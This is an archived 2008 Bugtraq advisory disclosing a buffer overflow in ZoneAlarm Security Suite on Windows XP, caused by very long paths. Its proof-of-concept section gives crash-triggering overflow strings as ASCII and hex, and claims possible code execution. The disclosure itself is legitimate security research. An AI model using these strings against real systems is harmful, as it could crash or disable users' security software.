lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200809110636.m8B6a7pC003041@www5.securityfocus.com>
Date: Thu, 11 Sep 2008 00:36:07 -0600
From: jplopezy@...il.com
To: bugtraq@...urityfocus.com
Subject: ZoneAlarm Security Suite buffer overflow


Application: ZoneAlarm Security Suite
OS: Windows Xp (All patches a day)
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
------------------------------------------------------
Description

The zonealarm is a known firewall,
which in the version "security suite" brings some tools as an antivirus, antispam and so on.

	
Details of the version

ZoneAlarm Security Suite versión:7.0.483.000
Versión de TrueVector:7.0.483.000
Versión del controlador:7.0.483.000
Versión de motor anti-virus:3
Versión de motor antivirus:5.0.1.85
Versión de archivo DAT de firma de anti-virus 915051681
Versión de motor de protección contra programas espía:5.0.189.0
Versión de archivo DAT de firma de protección contra programas espía 01.200801.3195
Versión de AntiSpam 5.0.6.8903


------------------------------------------------------
Vulnerability

The vulnerability is caused because the program can not analyze very long paths.
This causes a buffer overflow with the possibility of execution of code.

The flaw could be exploited by malware to leave without protection to the system for instance.
	
------------------------------------------------------
POC/EXPLOIT

	
Here you can view a video proof of concept

http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf


Strings


ASCII: · …  AAAAAAAAAAAAAAAAAAA · …  AAAAAAAAAAAAAAAAAAA · …  AAAAAAAAAAAAAAAAAAA · · …  AAAAAAAAAAAAAAAAAAA · …  AAAAAAAAAAAAAAAAAAA · …  AAAAAAAAAAAAAAAAAAA · · …  A · …  AAAAAAAAAAAAAAAAAAA · …  AAAAAAAAAAAAAAAAAAA

HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41


ASCII: ……………………………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41




------------------------------------------------------
Juan Pablo Lopez Yacubian

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ